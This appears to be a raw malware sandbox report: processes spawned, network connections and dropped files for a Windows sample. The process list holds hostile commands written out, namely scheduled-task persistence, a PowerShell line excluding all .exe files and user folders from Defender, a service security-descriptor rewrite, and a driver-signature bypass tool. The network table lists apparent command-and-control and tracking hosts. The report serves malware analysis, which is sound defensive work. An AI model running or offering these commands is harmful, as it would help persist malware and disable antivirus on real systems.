C:\Windows\Sysnative\bcdedit.exe /v

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /f /RU "Admin" /tr "C:\ProgramData\MSIUpdaterV131\MSIUpdaterV131.exe" /tn "MSIUpdaterV131 LG" /sc ONLOGON /rl HIGHEST

C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe

C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe

C:\Users\Admin\AppData\Local\Temp\heidi_K9P2oRtBlnq\svXurge7NCIUBVHrYG75.exe

"C:\Users\Admin\AppData\Local\Temp\heidi_K9P2oRtBlnq\svXurge7NCIUBVHrYG75.exe"

C:\Users\Admin\AppData\Local\Temp\6C6B.exe

C:\Users\Admin\AppData\Local\Temp\6C6B.exe

C:\Windows\system32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Users\Admin\AppData\Local\Temp\84BD.exe

C:\Users\Admin\AppData\Local\Temp\84BD.exe

C:\Users\Admin\AppData\Local\Temp\A6CE.exe

C:\Users\Admin\AppData\Local\Temp\A6CE.exe

C:\Users\Admin\AppData\Local\Temp\heidi_K9P2oRtBlnq\caYoou6AkD688ohBorlb.exe

"C:\Users\Admin\AppData\Local\Temp\heidi_K9P2oRtBlnq\caYoou6AkD688ohBorlb.exe"

C:\Windows\windefender.exe

"C:\Windows\windefender.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4076 -s 128

C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe

"C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe"

C:\Windows\SysWOW64\cmd.exe

cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

C:\Windows\SysWOW64\sc.exe

sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

C:\Windows\windefender.exe

C:\Windows\windefender.exe

C:\Users\Admin\AppData\Local\Temp\InstallSetup4.exe

"C:\Users\Admin\AppData\Local\Temp\InstallSetup4.exe"

C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe

C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe

C:\Users\Admin\AppData\Local\Temp\CF74.exe

C:\Users\Admin\AppData\Local\Temp\CF74.exe

C:\Users\Admin\AppData\Local\Temp\FourthX.exe

"C:\Users\Admin\AppData\Local\Temp\FourthX.exe"

C:\Users\Admin\AppData\Local\Temp\nsuDA1C.tmp

C:\Users\Admin\AppData\Local\Temp\nsuDA1C.tmp

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Roaming\Temp\Task.bat" "

C:\Windows\SysWOW64\chcp.com

chcp 1251

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /tn "MalayamaraUpdate" /tr "'C:\Users\Admin\AppData\Local\Temp\Updater.exe'" /sc minute /mo 30 /F

C:\Users\Admin\AppData\Local\Temp\EF74.exe

C:\Users\Admin\AppData\Local\Temp\EF74.exe

C:\Users\Admin\AppData\Local\Temp\is-R37QN.tmp\EF74.tmp

"C:\Users\Admin\AppData\Local\Temp\is-R37QN.tmp\EF74.tmp" /SL5="$303CE,4061719,54272,C:\Users\Admin\AppData\Local\Temp\EF74.exe"

C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe

"C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe"

C:\Windows\system32\taskeng.exe

taskeng.exe {8903C1B5-A8FA-445B-8D40-1E14AB9CCD71} S-1-5-18:NT AUTHORITY\System:Service:

C:\Users\Admin\AppData\Local\Temp\8.exe

C:\Users\Admin\AppData\Local\Temp\8.exe

C:\Users\Admin\AppData\Local\Temp\is-MIBAB.tmp\8.tmp

"C:\Users\Admin\AppData\Local\Temp\is-MIBAB.tmp\8.tmp" /SL5="$303CA,4314505,54272,C:\Users\Admin\AppData\Local\Temp\8.exe"

C:\Users\Admin\AppData\Local\Temp\305.exe

C:\Users\Admin\AppData\Local\Temp\305.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force

C:\Users\Admin\AppData\Local\Temp\MJtmiEaOySOnsMbTj\ProJgWWzBHWXbAm\XOmGTSn.exe

C:\Users\Admin\AppData\Local\Temp\MJtmiEaOySOnsMbTj\ProJgWWzBHWXbAm\XOmGTSn.exe Fm /fBsite_idZpU 525403 /S

Network

Country Destination Domain Proto
DE 77.105.147.130:80 77.105.147.130 tcp
US 8.8.8.8:53 api.myip.com udp
US 104.26.8.59:443 api.myip.com tcp
US 8.8.8.8:53 ipinfo.io udp
US 34.117.186.192:443 ipinfo.io tcp
US 34.117.186.192:443 ipinfo.io tcp
US 8.8.8.8:53 cczhk.com udp
US 8.8.8.8:53 medfioytrkdkcodlskeej.net udp
US 8.8.8.8:53 vk.com udp
US 8.8.8.8:53 cleued.com udp
US 8.8.8.8:53 def.bestsup.su udp
US 8.8.8.8:53 294down-river.sbs udp
US 8.8.8.8:53 acenitive.shop udp
US 8.8.8.8:53 monoblocked.com udp
RU 147.45.47.101:80 147.45.47.101 tcp
DE 185.172.128.127:80 185.172.128.127 tcp
RU 91.215.85.209:80 medfioytrkdkcodlskeej.net tcp
RU 87.240.132.78:80 vk.com tcp
RU 87.240.132.78:80 vk.com tcp
US 172.67.215.205:80 acenitive.shop tcp
US 172.67.215.205:80 acenitive.shop tcp
US 104.21.29.103:80 def.bestsup.su tcp
US 172.67.180.151:80 294down-river.sbs tcp
US 172.67.154.10:80 cleued.com tcp
RU 45.130.41.108:80 monoblocked.com tcp
AR 190.224.203.37:80 cczhk.com tcp
US 172.67.180.151:443 294down-river.sbs tcp
US 172.67.215.205:80 acenitive.shop tcp
US 172.67.154.10:80 cleued.com tcp
US 172.67.215.205:80 acenitive.shop tcp
RU 87.240.132.78:80 vk.com tcp
RU 87.240.132.78:80 vk.com tcp
RU 91.215.85.209:80 medfioytrkdkcodlskeej.net tcp
RU 45.130.41.108:80 monoblocked.com tcp
US 172.67.154.10:80 cleued.com tcp
US 172.67.215.205:80 acenitive.shop tcp
US 172.67.215.205:80 acenitive.shop tcp
US 172.67.154.10:80 cleued.com tcp
US 172.67.215.205:80 acenitive.shop tcp
US 172.67.215.205:80 acenitive.shop tcp
US 172.67.154.10:443 cleued.com tcp
US 172.67.215.205:443 acenitive.shop tcp
US 172.67.215.205:443 acenitive.shop tcp
RU 87.240.132.78:80 vk.com tcp
RU 87.240.132.78:80 vk.com tcp
RU 91.215.85.209:80 medfioytrkdkcodlskeej.net tcp
RU 45.130.41.108:80 monoblocked.com tcp
AR 190.224.203.37:80 cczhk.com tcp
RU 87.240.132.78:80 vk.com tcp
RU 87.240.132.78:80 vk.com tcp
US 8.8.8.8:53 pergor.com udp
RU 91.215.85.209:80 medfioytrkdkcodlskeej.net tcp
RU 45.130.41.108:80 monoblocked.com tcp
RU 45.130.41.108:443 monoblocked.com tcp
US 104.21.32.227:443 pergor.com tcp
RU 91.215.85.209:443 medfioytrkdkcodlskeej.net tcp
RU 87.240.132.78:80 vk.com tcp
RU 87.240.132.78:80 vk.com tcp
RU 87.240.132.78:80 vk.com tcp
RU 87.240.132.78:80 vk.com tcp
US 8.8.8.8:53 apps.identrust.com udp
GB 96.17.179.184:80 apps.identrust.com tcp
RU 87.240.132.78:80 vk.com tcp
RU 87.240.132.78:80 vk.com tcp
RU 87.240.132.78:80 vk.com tcp
RU 87.240.132.78:80 vk.com tcp
RU 87.240.132.78:80 vk.com tcp
RU 87.240.132.78:80 vk.com tcp
RU 87.240.132.78:80 vk.com tcp
RU 87.240.132.78:80 vk.com tcp
RU 87.240.132.78:80 vk.com tcp
US 8.8.8.8:53 632432.site udp
RU 87.240.132.78:80 vk.com tcp
NL 194.104.136.64:443 632432.site tcp
RU 87.240.132.78:80 vk.com tcp
RU 87.240.132.78:80 vk.com tcp
RU 87.240.132.78:80 vk.com tcp
RU 87.240.132.78:80 vk.com tcp
RU 87.240.132.78:80 vk.com tcp
RU 87.240.132.78:80 vk.com tcp
RU 87.240.132.78:80 vk.com tcp
RU 87.240.132.78:80 vk.com tcp
RU 87.240.132.78:80 vk.com tcp
RU 87.240.132.78:80 vk.com tcp
RU 87.240.132.78:80 vk.com tcp
RU 87.240.132.78:80 vk.com tcp
RU 87.240.132.78:80 vk.com tcp
RU 87.240.132.78:80 vk.com tcp
RU 87.240.132.78:80 vk.com tcp
RU 87.240.132.78:80 vk.com tcp
RU 87.240.132.78:80 vk.com tcp
RU 87.240.132.78:80 vk.com tcp
RU 87.240.132.78:443 vk.com tcp
RU 87.240.132.78:443 vk.com tcp
RU 87.240.132.78:443 vk.com tcp
RU 87.240.132.78:443 vk.com tcp
RU 87.240.132.78:443 vk.com tcp
RU 87.240.132.78:443 vk.com tcp
RU 87.240.132.78:443 vk.com tcp
RU 87.240.132.78:443 vk.com tcp
RU 87.240.132.78:443 vk.com tcp
RU 87.240.132.78:443 vk.com tcp
DE 77.105.147.130:80 77.105.147.130 tcp
US 8.8.8.8:53 iplis.ru udp
US 104.21.63.150:443 iplis.ru tcp
US 8.8.8.8:53 iplogger.org udp
DE 185.172.128.24:80 185.172.128.24 tcp
DE 77.105.147.130:80 77.105.147.130 tcp
US 172.67.132.113:443 iplogger.org tcp
US 8.8.8.8:53 api.myip.com udp
US 104.26.8.59:443 api.myip.com tcp
US 8.8.8.8:53 ipinfo.io udp
US 34.117.186.192:443 ipinfo.io tcp
US 34.117.186.192:443 ipinfo.io tcp
NL 195.20.16.46:80 195.20.16.46 tcp
NL 195.20.16.46:80 195.20.16.46 tcp
US 8.8.8.8:53 iplis.ru udp
US 172.67.147.32:443 iplis.ru tcp
US 172.67.132.113:443 iplogger.org tcp
US 8.8.8.8:53 068aa7a0-365c-4e37-892e-354720613d6a.uuid.theupdatetime.org udp
US 8.8.8.8:53 msdl.microsoft.com udp
US 204.79.197.219:443 msdl.microsoft.com tcp
US 8.8.8.8:53 clients2.google.com udp
GB 142.250.200.14:443 clients2.google.com tcp
US 8.8.8.8:53 vsblobprodscussu5shard30.blob.core.windows.net udp
US 20.150.79.68:443 vsblobprodscussu5shard30.blob.core.windows.net tcp
RU 193.233.132.62:50500 tcp
US 8.8.8.8:53 ipinfo.io udp
US 34.117.186.192:443 ipinfo.io tcp
US 34.117.186.192:443 ipinfo.io tcp
US 8.8.8.8:53 api.tris.com udp
US 104.21.60.34:443 api.tris.com tcp
US 8.8.8.8:53 db-ip.com udp
US 172.67.75.166:443 db-ip.com tcp
N/A 224.0.0.251:5353 udp
RU 185.215.113.46:80 185.215.113.46 tcp
US 8.8.8.8:53 selebration17io.io udp
RU 91.215.85.120:80 selebration17io.io tcp
US 8.8.8.8:53 www.facebook.com udp
US 8.8.8.8:53 www.linkedin.com udp
US 8.8.8.8:53 accounts.google.com udp
US 8.8.8.8:53 www.youtube.com udp
NL 173.194.79.84:443 accounts.google.com tcp
NL 173.194.79.84:443 accounts.google.com tcp
FR 157.240.195.35:443 www.facebook.com tcp
US 13.107.42.14:443 www.linkedin.com tcp
US 13.107.42.14:443 www.linkedin.com tcp
FR 157.240.195.35:443 www.facebook.com tcp
GB 142.250.187.238:443 www.youtube.com tcp
GB 142.250.187.238:443 www.youtube.com tcp
US 8.8.8.8:53 static.licdn.com udp
FR 152.199.21.118:443 static.licdn.com tcp
FR 152.199.21.118:443 static.licdn.com tcp
FR 152.199.21.118:443 static.licdn.com tcp
FR 152.199.21.118:443 static.licdn.com tcp
FR 152.199.21.118:443 static.licdn.com tcp
FR 152.199.21.118:443 static.licdn.com tcp
DE 178.254.31.125:443 tcp
US 8.8.8.8:53 platform.linkedin.com udp
US 13.107.246.64:443 platform.linkedin.com tcp
US 13.107.246.64:443 platform.linkedin.com tcp
CA 198.245.60.91:443 tcp
LV 195.123.209.91:5092 tcp
US 8.8.8.8:53 vsblobprodscussu5shard20.blob.core.windows.net udp
US 20.150.79.68:443 vsblobprodscussu5shard20.blob.core.windows.net tcp
US 204.79.197.200:443 ieonline.microsoft.com tcp
US 204.79.197.200:443 ieonline.microsoft.com tcp
US 8.8.8.8:53 www.google.com udp
GB 172.217.16.228:443 www.google.com tcp
GB 172.217.16.228:443 www.google.com tcp
US 8.8.8.8:53 accounts.youtube.com udp
GB 172.217.16.238:443 accounts.youtube.com tcp
GB 172.217.16.238:443 accounts.youtube.com tcp
FR 157.240.195.35:443 www.facebook.com tcp
DE 165.227.174.150:9001 tcp
US 128.31.0.39:9101 tcp
US 8.8.8.8:53 m.facebook.com udp
GB 163.70.147.35:443 m.facebook.com tcp
GB 163.70.147.35:443 m.facebook.com tcp
GB 163.70.147.35:443 m.facebook.com tcp
US 8.8.8.8:53 static.xx.fbcdn.net udp
GB 163.70.147.23:443 static.xx.fbcdn.net tcp
GB 163.70.147.23:443 static.xx.fbcdn.net tcp
GB 163.70.147.23:443 static.xx.fbcdn.net tcp
GB 163.70.147.23:443 static.xx.fbcdn.net tcp
GB 163.70.147.23:443 static.xx.fbcdn.net tcp
GB 163.70.147.23:443 static.xx.fbcdn.net tcp
US 8.8.8.8:53 facebook.com udp
GB 163.70.147.35:443 facebook.com tcp
GB 163.70.147.35:443 facebook.com tcp
GB 163.70.147.23:443 static.xx.fbcdn.net tcp
GB 163.70.147.23:443 static.xx.fbcdn.net tcp
GB 163.70.147.23:443 static.xx.fbcdn.net tcp
GB 163.70.147.35:443 facebook.com tcp
GB 163.70.147.23:443 static.xx.fbcdn.net tcp
GB 163.70.147.23:443 static.xx.fbcdn.net tcp
GB 163.70.147.23:443 static.xx.fbcdn.net tcp
GB 163.70.147.23:443 static.xx.fbcdn.net tcp
GB 163.70.147.23:443 static.xx.fbcdn.net tcp
US 8.8.8.8:53 fbcdn.net udp
GB 163.70.147.35:443 fbcdn.net tcp
GB 163.70.147.35:443 fbcdn.net tcp
US 8.8.8.8:53 stun2.l.google.com udp
US 8.8.8.8:53 server7.theupdatetime.org udp
US 8.8.8.8:53 cdn.discordapp.com udp
NL 192.42.116.17:443 tcp
US 8.8.8.8:53 crls.pki.goog udp
US 8.8.8.8:53 crls.pki.goog udp
US 8.8.8.8:53 crls.pki.goog udp
BG 185.82.216.108:443 server7.theupdatetime.org tcp
US 8.8.8.8:53 crls.pki.goog udp
US 162.159.134.233:443 cdn.discordapp.com tcp
GB 172.217.16.227:80 crls.pki.goog tcp
GB 172.217.16.227:80 crls.pki.goog tcp
GB 172.217.16.227:80 crls.pki.goog tcp
GB 172.217.16.227:80 crls.pki.goog tcp
GB 172.217.16.227:80 crls.pki.goog tcp
GB 172.217.16.227:80 crls.pki.goog tcp
GB 172.217.16.227:80 crls.pki.goog tcp
GB 172.217.16.227:80 crls.pki.goog tcp
GB 172.217.16.227:80 crls.pki.goog tcp
GB 172.217.16.227:80 crls.pki.goog tcp
GB 172.217.16.227:80 crls.pki.goog tcp
IT 142.251.27.127:19302 stun2.l.google.com udp
US 8.8.8.8:53 fbsbx.com udp
GB 163.70.147.35:443 fbsbx.com tcp
GB 163.70.147.35:443 fbsbx.com tcp
FR 157.240.195.35:443 www.facebook.com tcp
FR 157.240.195.35:443 www.facebook.com tcp
FR 157.240.195.35:443 www.facebook.com tcp
FR 157.240.195.35:443 www.facebook.com tcp
FR 157.240.195.35:443 www.facebook.com tcp
US 8.8.8.8:53 walkinglate.com udp
US 188.114.97.2:443 walkinglate.com tcp
US 154.35.175.225:443 tcp
US 8.8.8.8:53 scontent.xx.fbcdn.net udp
GB 163.70.147.23:443 scontent.xx.fbcdn.net tcp
GB 163.70.147.23:443 scontent.xx.fbcdn.net tcp
DE 212.227.171.107:9001 tcp
US 162.237.207.53:80 tcp
GB 163.70.147.35:443 fbsbx.com tcp
DE 212.227.171.107:9001 tcp
BG 185.82.216.108:443 server7.theupdatetime.org tcp
US 162.237.207.53:80 tcp
DE 185.172.128.19:80 185.172.128.19 tcp
BG 185.82.216.108:443 server7.theupdatetime.org tcp
US 8.8.8.8:53 trmpc.com udp
KR 211.119.84.111:80 trmpc.com tcp
US 8.8.8.8:53 en.bestsup.su udp
US 104.21.29.103:80 en.bestsup.su tcp
DE 185.172.128.90:80 185.172.128.90 tcp
DE 185.172.128.127:80 185.172.128.127 tcp
DE 185.172.128.145:80 185.172.128.145 tcp
US 174.128.250.163:80 tcp
US 8.8.8.8:53 pre-usapass.com udp
US 8.8.8.8:53 preparedppl.com udp
US 104.21.57.254:443 pre-usapass.com tcp
US 146.190.161.121:443 preparedppl.com tcp
US 8.8.8.8:53 printescort.com udp
US 8.8.8.8:53 programas99.com udp
US 8.8.8.8:53 pronamelist.com udp
US 8.8.8.8:53 psichemlabs.com udp
US 104.21.87.214:80 printescort.com tcp
BR 149.62.37.31:443 programas99.com tcp
US 104.21.82.49:443 pronamelist.com tcp
US 8.8.8.8:53 pumaescorts.com udp
US 8.8.8.8:53 puretrolley.com udp
US 8.8.8.8:53 pursfinance.com udp
AT 5.42.64.33:80 5.42.64.33 tcp
US 8.8.8.8:53 www.printescort.com udp
US 8.8.8.8:53 pwpconcrete.com udp
US 188.114.96.2:80 pumaescorts.com tcp
US 8.8.8.8:53 qrlaunchpad.com udp
US 162.254.39.102:443 pursfinance.com tcp
US 172.67.146.210:443 www.printescort.com tcp
US 50.87.253.59:80 pwpconcrete.com tcp
US 170.39.77.97:443 qrlaunchpad.com tcp
US 8.8.8.8:53 quicklisted.com udp
US 8.8.8.8:53 quoteswings.com udp
US 8.8.8.8:53 r1-remapecu.com udp
US 8.8.8.8:53 www.pronamelist.com udp
IN 82.180.143.216:443 quicklisted.com tcp
GB 45.77.57.25:443 quoteswings.com tcp
US 8.8.8.8:53 www.radi8forged.com udp
US 172.67.153.107:443 www.pronamelist.com tcp
US 8.8.8.8:53 rajpootentp.com udp
US 8.8.8.8:53 ramnaturals.com udp
FR 92.205.58.241:443 www.radi8forged.com tcp
US 8.8.8.8:53 ramenxsushi.com udp
US 8.8.8.8:53 www.pumaescorts.com udp
US 8.8.8.8:53 randpdetail.com udp
US 66.55.68.202:443 rajpootentp.com tcp
SG 217.21.74.13:443 ramnaturals.com tcp
US 8.8.8.8:53 www.life1.us udp
SG 185.229.118.125:443 r1-remapecu.com tcp
US 188.114.97.2:443 www.pumaescorts.com tcp
DE 159.69.71.60:80 ramenxsushi.com tcp
US 68.65.122.52:443 www.life1.us tcp
US 208.109.58.44:80 randpdetail.com tcp
US 8.8.8.8:53 rebkerfuels.com udp
US 8.8.8.8:53 redesportes.com udp
US 8.8.8.8:53 rentinhminh.com udp
US 8.8.8.8:53 rejuvemenow.com udp
US 8.8.8.8:53 remix593djs.com udp
US 8.8.8.8:53 rent-pro-in.com udp
US 8.8.8.8:53 riccreative.com udp
US 8.8.8.8:53 renaldhicap.com udp
US 8.8.8.8:53 resultshala.com udp
US 8.8.8.8:53 replayagile.com udp
US 8.8.8.8:53 richbinbong.com udp
US 198.23.59.151:443 rebkerfuels.com tcp
US 8.8.8.8:53 rimvierlink.com udp
FI 65.109.88.87:443 remix593djs.com tcp
BR 89.117.7.145:443 redesportes.com tcp
US 103.224.212.215:443 retrotowear.com tcp
SG 185.232.14.221:443 renaldhicap.com tcp
FR 89.117.169.178:443 replayagile.com tcp
VN 103.74.117.27:443 rentinhminh.com tcp
US 8.8.8.8:53 rohitjamwal.com udp
SG 194.163.42.237:443 riccreative.com tcp
US 8.8.8.8:53 www.rollsfebric.com udp
IN 82.180.143.184:443 resultshala.com tcp
US 192.185.225.202:443 rejuvemenow.com tcp
US 172.67.169.155:443 rent-pro-in.com tcp
US 8.8.8.8:53 roka.academy udp
KR 158.247.215.252:443 richbinbong.com tcp
US 66.29.137.48:443 rohitjamwal.com tcp
GB 154.49.138.162:443 rimvierlink.com tcp
US 8.8.8.8:53 romanticbom.com udp
US 8.8.8.8:53 rightvolume.com udp
US 8.8.8.8:53 royalgiftss.com udp
US 8.8.8.8:53 ruta-medica.com udp
US 8.8.8.8:53 sabdakhabar.com udp
US 8.8.8.8:53 sajiasondha.com udp
US 8.8.8.8:53 samchil3737.com udp
US 8.8.8.8:53 salarygraph.com udp
DE 139.162.138.101:443 royalgiftss.com tcp
US 104.21.18.147:443 sabdakhabar.com tcp
US 172.67.215.90:443 rightvolume.com tcp
US 192.185.97.168:443 sajiasondha.com tcp
US 166.0.238.62:443 salarygraph.com tcp
SG 139.59.124.84:443 romanticbom.com tcp
US 62.72.50.130:443 ruta-medica.com tcp
KR 3.38.89.57:443 samchil3737.com tcp
US 8.8.8.8:53 salonesluaj.com udp
US 8.8.8.8:53 sampaisenak.com udp
US 8.8.8.8:53 sandwich665.com udp
US 8.8.8.8:53 sapimarcell.com udp
US 8.8.8.8:53 sjyey.com udp
US 8.8.8.8:53 saudeativas.com udp
US 8.8.8.8:53 www.samsarasaga.com udp
US 8.8.8.8:53 santafechat.com udp
US 8.8.8.8:53 sarahnickle.com udp
US 8.8.8.8:53 sasadangoch.com udp
US 8.8.8.8:53 schulichbla.com udp
US 8.8.8.8:53 sconticaldi.com udp
US 8.8.8.8:53 sdl-montage.com udp
US 8.8.8.8:53 life1.us udp
US 8.8.8.8:53 serviassist.com udp
UY 179.25.2.109:80 sjyey.com tcp
US 195.179.237.107:443 salonesluaj.com tcp
US 162.241.218.16:443 www.samsarasaga.com tcp
US 68.65.122.52:443 life1.us tcp
US 162.241.2.55:443 saudeativas.com tcp
TH 27.254.86.114:443 sandwich665.com tcp
NL 162.0.217.16:443 sconticaldi.com tcp
US 108.167.181.82:443 serviassist.com tcp
UA 185.91.75.28:443 sdl-montage.com tcp
HU 79.139.61.191:80 sapimarcell.com tcp
BR 45.152.44.64:443 santafechat.com tcp
US 188.114.96.2:443 sarahnickle.com tcp
US 162.241.216.86:80 schulichbla.com tcp
JP 152.70.97.21:443 sasadangoch.com tcp
US 8.8.8.8:53 servico-lux.com udp
US 8.8.8.8:53 shaddaizate.com udp
US 8.8.8.8:53 sikhescorts.com udp
US 8.8.8.8:53 shamsmediaa.com udp
US 8.8.8.8:53 shahinlight.com udp
US 8.8.8.8:53 shub-gaming.com udp
US 8.8.8.8:53 sionsoporte.com udp
US 8.8.8.8:53 skdigiworld.com udp
US 8.8.8.8:53 countdowndisplay.com udp
US 8.8.8.8:53 agencaimpact.com udp
US 8.8.8.8:53 skyllarpost.com udp
US 8.8.8.8:53 agtekconsult.com udp
US 8.8.8.8:53 shradarblog.com udp
US 8.8.8.8:53 silvialeung.com udp
US 8.8.8.8:53 six6s-score.com udp
US 8.8.8.8:53 www.skytvnews24.com udp
US 8.8.8.8:53 agenciavucan.com udp
US 8.8.8.8:53 agvadvogados.com udp
US 172.67.212.238:443 shamsmediaa.com tcp
US 104.21.43.88:80 sikhescorts.com tcp
FR 92.204.41.25:443 skdigiworld.com tcp
US 8.8.8.8:53 ainomadkorea.com udp
BR 149.100.155.110:443 agenciavucan.com tcp
US 172.67.169.50:443 silvialeung.com tcp
US 8.8.8.8:53 ahmadalasmar.com udp
US 162.210.96.118:443 shahinlight.com tcp
IN 13.235.49.244:443 six6s-score.com tcp
US 50.87.182.95:80 shradarblog.com tcp
FR 89.117.169.85:443 shaddaizate.com tcp
BR 149.100.155.192:443 sionsoporte.com tcp
US 162.241.203.175:443 agvadvogados.com tcp
US 8.8.8.8:53 ainomanwater.com udp
US 8.8.8.8:53 aipostershop.com udp
US 8.8.8.8:53 aldocomunica.com udp
US 23.251.47.7:80 shub-gaming.com tcp
FI 65.109.39.121:443 www.skytvnews24.com tcp
US 104.21.12.208:443 servico-lux.com tcp
BE 188.208.36.67:443 countdowndisplay.com tcp
US 66.29.146.52:443 agtekconsult.com tcp
US 216.246.47.89:443 agencaimpact.com tcp
US 162.214.80.64:443 skyllarpost.com tcp
US 8.8.8.8:53 www.sapimarcell.com udp
US 217.21.77.16:443 aldocomunica.com tcp
IN 89.117.188.132:443 ainomanwater.com tcp
US 86.38.202.67:443 ahmadalasmar.com tcp
US 8.8.8.8:53 airbornezone.com udp
US 8.8.8.8:53 allianzvisas.com udp
US 8.8.8.8:53 all-spravkau.com udp
US 8.8.8.8:53 www.shamsmediaa.com udp
FR 185.154.136.89:443 aipostershop.com tcp
US 8.8.8.8:53 www.sikhescorts.com udp
US 8.8.8.8:53 alexteeshirt.com udp
KR 183.111.242.42:443 ainomadkorea.com tcp
US 172.67.144.140:443 all-spravkau.com tcp
HU 79.139.61.191:80 www.sapimarcell.com tcp
US 172.67.134.61:443 airbornezone.com tcp
US 104.21.50.228:443 www.shamsmediaa.com tcp
US 172.67.177.103:443 www.sikhescorts.com tcp
IN 103.180.163.202:443 allianzvisas.com tcp
US 8.8.8.8:53 amnaasifqazi.com udp
DE 139.162.138.101:443 royalgiftss.com tcp
US 8.8.8.8:53 amminovation.com udp
US 154.49.142.244:443 amnaasifqazi.com tcp
US 172.67.163.174:443 amminovation.com tcp
US 8.8.8.8:53 alexconverts.com udp
US 8.8.8.8:53 angelichaydn.com udp
US 8.8.8.8:53 anantasprint.com udp
US 8.8.8.8:53 anthonybahor.com udp
US 8.8.8.8:53 argroupqatar.com udp
US 8.8.8.8:53 www.sarahnickle.com udp
US 8.8.8.8:53 atacarejo313.com udp
US 8.8.8.8:53 sashimi-sp.com udp
US 8.8.8.8:53 angelmakesco.com udp
US 8.8.8.8:53 www.silvialeung.com udp
US 8.8.8.8:53 arahfengshui.com udp
US 8.8.8.8:53 ashczaszmods.com udp
US 8.8.8.8:53 annefrandsen.com udp
US 8.8.8.8:53 apollomenspa.com udp
US 8.8.8.8:53 all-spravkay.com udp
US 8.8.8.8:53 australia128.com udp
US 8.8.8.8:53 asiafoodguru.com udp
US 8.8.8.8:53 aulloxsapser.com udp
US 8.8.8.8:53 dominicsservices.com udp
US 8.8.8.8:53 yourbookcorner.com udp
US 8.8.8.8:53 attunednovelty.com udp
US 8.8.8.8:53 kunstfilmkunst.de udp
US 8.8.8.8:53 langagesavoirs.com udp
US 8.8.8.8:53 landlochinvest.com udp
US 8.8.8.8:53 laterretagreen.com udp
US 8.8.8.8:53 letschangelife.com udp
US 8.8.8.8:53 ldoddsolutions.com udp
US 8.8.8.8:53 lion7marketing.com udp
UY 179.25.2.109:80 sjyey.com tcp
US 216.246.47.89:443 agencaimpact.com tcp
IS 178.19.59.35:80 annefrandsen.com tcp
US 188.114.97.2:443 www.silvialeung.com tcp
US 89.117.9.188:443 anantasprint.com tcp
US 162.241.217.117:443 anthonybahor.com tcp
US 67.223.118.22:443 dominicsservices.com tcp
US 172.67.202.213:443 apollomenspa.com tcp
US 23.111.147.170:443 aulloxsapser.com tcp
ID 103.187.146.19:443 arahfengshui.com tcp
US 172.67.191.105:443 sashimi-sp.com tcp
US 172.67.169.170:443 all-spravkay.com tcp
US 68.178.246.177:443 angelmakesco.com tcp
US 195.35.15.168:443 alexconverts.com tcp
FR 13.39.145.251:443 yourbookcorner.com tcp
US 162.241.217.126:80 angelichaydn.com tcp
US 104.21.37.70:443 asiafoodguru.com tcp
US 106.0.62.84:443 letschangelife.com tcp
US 172.67.161.144:443 www.sarahnickle.com tcp
SG 151.106.123.154:443 argroupqatar.com tcp
US 172.67.211.117:443 langagesavoirs.com tcp
US 173.236.201.19:443 ashczaszmods.com tcp
US 107.154.160.254:443 landlochinvest.com tcp
NL 145.14.151.116:443 laterretagreen.com tcp
DE 81.169.145.148:443 kunstfilmkunst.de tcp
US 198.54.125.130:443 attunednovelty.com tcp
BR 187.17.111.35:80 atacarejo313.com tcp
US 172.67.172.134:443 lion7marketing.com tcp
US 162.241.253.180:443 ldoddsolutions.com tcp
AU 45.77.237.203:443 australia128.com tcp
US 8.8.8.8:53 www.looqus.com udp
US 8.8.8.8:53 www.aipostershop.com udp
US 8.8.8.8:53 www.lockboxamerica.com udp
US 8.8.8.8:53 lovesecretshub.com udp
US 8.8.8.8:53 imunify-alert.com udp

Files

memory/2292-0-0x0000000140000000-0x0000000140C54000-memory.dmp

memory/2292-1-0x0000000140000000-0x0000000140C54000-memory.dmp

memory/2292-2-0x00000000001E0000-0x00000000001E1000-memory.dmp

memory/2292-3-0x000007FEFCEF0000-0x000007FEFCF5C000-memory.dmp

memory/2292-4-0x000007FEFCEF0000-0x000007FEFCF5C000-memory.dmp

memory/2292-5-0x000007FEFCEF0000-0x000007FEFCF5C000-memory.dmp

memory/2292-6-0x0000000076DB0000-0x0000000076F59000-memory.dmp

memory/2292-7-0x000007FE80010000-0x000007FE80011000-memory.dmp

memory/2292-8-0x0000000140000000-0x0000000140C54000-memory.dmp

memory/2292-9-0x0000000140000000-0x0000000140C54000-memory.dmp

memory/2292-10-0x0000000140000000-0x0000000140C54000-memory.dmp

memory/2292-11-0x0000000140000000-0x0000000140C54000-memory.dmp

memory/2292-12-0x0000000140000000-0x0000000140C54000-memory.dmp

memory/2292-20-0x0000000140000000-0x0000000140C54000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Tar3410.tmp

MD5 9c0c641c06238516f27941aa1166d427
SHA1 64cd549fb8cf014fcd9312aa7a5b023847b6c977
